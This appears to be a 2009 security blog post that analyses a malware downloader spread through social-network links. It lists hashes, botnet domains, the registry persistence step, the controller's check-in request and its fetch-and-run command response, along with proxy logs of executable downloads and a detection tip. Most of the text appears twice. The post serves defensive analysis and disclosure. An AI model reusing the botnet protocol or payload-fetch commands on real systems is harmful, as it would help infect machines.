Downloader reportedly from Myspace Profiles -- Updated
A friend sent me an email about some automatic malware downloads coming from myspace profiles.
She noted that the downloads appeared to be coming from "http://76[.]229[.]115[.]167/setup[.]exe"
I grabbed a couple of versions of the binary,
483a215a155a99f91cee79834493aadc and ec8dfdfebca19460d6b768b9040fb07b. Both were detected by Antivir as TR/Downloader.Gen
I took a quick look at the file and some of the hardcoded domains include:
The bot is written to the windows directory (%windir%) with the file name ld12.exe. The ld12.exe file is then added to the run registry key to auto start if the system is rebooted.
piupiu-110809.com appears to be the botnet controller:
GET /ld/gen.php?f=0&a=1680587786&v=12&c=0&s=ld&l=1234&ck=0&c_fb=0&c_ms=0&c_hi=0&c_tw=0&c_be=0&c_fr=-2&c_yb=-2&c_tg=0&c_nl=0&c_fu=-2 HTTP/1.1
Host: piupiu-110809.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; na; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Content-type: application/x-www-form-urlencoded
Connection: close
The response back from the server looks like this:
(added []'s for safety)
This is the web activity:
xx.xx.xx.102 - - [16/Aug/2009:20:17:31 -0600] "POST http://piupiu-110809[.]com/achcheck.php HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 7.0; na; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
xx.xx.xx.102 - - [16/Aug/2009:20:17:31 -0600] "GET http://piupiu-110809[.]com/ld/gen.php?f=0&a=1680587786&v=12&c=0&s=ld&l=1234&ck=0&c_fb=0&c_ms=0&c_hi=0&c_tw=0&c_be=0&c_fr=-2&c_yb=-2&c_tg=0&c_nl=0&c_fu=-2 HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 7.0; na; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
xx.xx.xx.102 - - [16/Aug/2009:20:17:31 -0600] "GET http://web[.]reg[.]md/1/p.jpg HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 7.0; na; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
xx.xx.xx.102 - - [16/Aug/2009:20:17:31 -0600] "GET http://web[.]reg[.]md/1/prx.exe HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
xx.xx.xx.102 - - [16/Aug/2009:20:17:31 -0600] "GET http://web[.]reg[.]md/1/pp.11.exe HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
xx.xx.xx.102 - - [16/Aug/2009:20:17:31 -0600] "POST http://221[.]5[.]74[.]46/p/in.php HTTP/1.0" - - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; InfoPath.1)"
Once the downloader grabs the new files, any sort of badness could happen.
Snort signatures that watch for the user agent: "MSIE 7.0; na;" will likely catch infected hosts.
Thanks to Alida for the heads up and binary.
Update:
Alida received a link to this binary via email. The link actually points to a poorly constructed Facebook image which suggests to the user they must download a plugin.
Another concern that several users are having is related to b.ashx from Myspace.
Safari and Firefox users that are receiving errors when downloading .ashx files, please contact your browser vendor.
ASHX files contain server side scripts for handling dynamic content. These files are part of the MS ASP.NET web framework. You're likely getting download errors due to incorrect file associations. Alternatively, one could use IE. -- Did I just say that? :)
$ wget -qO /dev/stdout http://b.myspace.com/~myspace/beacon/b.ashx
<html> </html>
$
She noted that the downloads appeared to be coming from "http://76[.]229[.]115[.]167/setup[.]exe"
I grabbed a couple of versions of the binary,
483a215a155a99f91cee79834493aadc and ec8dfdfebca19460d6b768b9040fb07b. Both were detected by Antivir as TR/Downloader.Gen
I took a quick look at the file and some of the hardcoded domains include:
bombimbom20090809.com
glavnij20090809.com
piupiu-110809.com
web.reg.md
ya.ru
zz-dns.com
The bot is written to the windows directory (%windir%) with the file name ld12.exe. The ld12.exe file is then added to the run registry key to auto start if the system is rebooted.
piupiu-110809.com appears to be the botnet controller:
GET /ld/gen.php?f=0&a=1680587786&v=12&c=0&s=ld&l=1234&ck=0&c_fb=0&c_ms=0&c_hi=0&c_tw=0&c_be=0&c_fr=-2&c_yb=-2&c_tg=0&c_nl=0&c_fu=-2 HTTP/1.1
Host: piupiu-110809.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; na; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Content-type: application/x-www-form-urlencoded
Connection: close
The response back from the server looks like this:
a6
#PID=1000
STARTONCEIMG|http://web[.]reg[.]md/1/p.jpg|193854730d993dfgdfjkng345
STARTONCE|http://web[.]reg[.]md/1/prx.exe
START|http://web[.]reg[.]md/1/pp.11.exe
#BLACKLABEL
EXIT
0
(added []'s for safety)
This is the web activity:
xx.xx.xx.102 - - [16/Aug/2009:20:17:31 -0600] "POST http://piupiu-110809[.]com/achcheck.php HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 7.0; na; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
xx.xx.xx.102 - - [16/Aug/2009:20:17:31 -0600] "GET http://piupiu-110809[.]com/ld/gen.php?f=0&a=1680587786&v=12&c=0&s=ld&l=1234&ck=0&c_fb=0&c_ms=0&c_hi=0&c_tw=0&c_be=0&c_fr=-2&c_yb=-2&c_tg=0&c_nl=0&c_fu=-2 HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 7.0; na; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
xx.xx.xx.102 - - [16/Aug/2009:20:17:31 -0600] "GET http://web[.]reg[.]md/1/p.jpg HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 7.0; na; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
xx.xx.xx.102 - - [16/Aug/2009:20:17:31 -0600] "GET http://web[.]reg[.]md/1/prx.exe HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
xx.xx.xx.102 - - [16/Aug/2009:20:17:31 -0600] "GET http://web[.]reg[.]md/1/pp.11.exe HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
xx.xx.xx.102 - - [16/Aug/2009:20:17:31 -0600] "POST http://221[.]5[.]74[.]46/p/in.php HTTP/1.0" - - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; InfoPath.1)"
Once the downloader grabs the new files, any sort of badness could happen.
Snort signatures that watch for the user agent: "MSIE 7.0; na;" will likely catch infected hosts.
Thanks to Alida for the heads up and binary.
Update:
Alida received a link to this binary via email. The link actually points to a poorly constructed Facebook image which suggests to the user they must download a plugin.
Another concern that several users are having is related to b.ashx from Myspace.
Safari and Firefox users that are receiving errors when downloading .ashx files, please contact your browser vendor.
ASHX files contain server side scripts for handling dynamic content. These files are part of the MS ASP.NET web framework. You're likely getting download errors due to incorrect file associations. Alternatively, one could use IE. -- Did I just say that? :)
$ wget -qO /dev/stdout http://b.myspace.com/~myspace/beacon/b.ashx
<html> </html>
$
Labels: http botnet, Snort, Social Networking
posted by Nicholas at
04:17
4 Comments
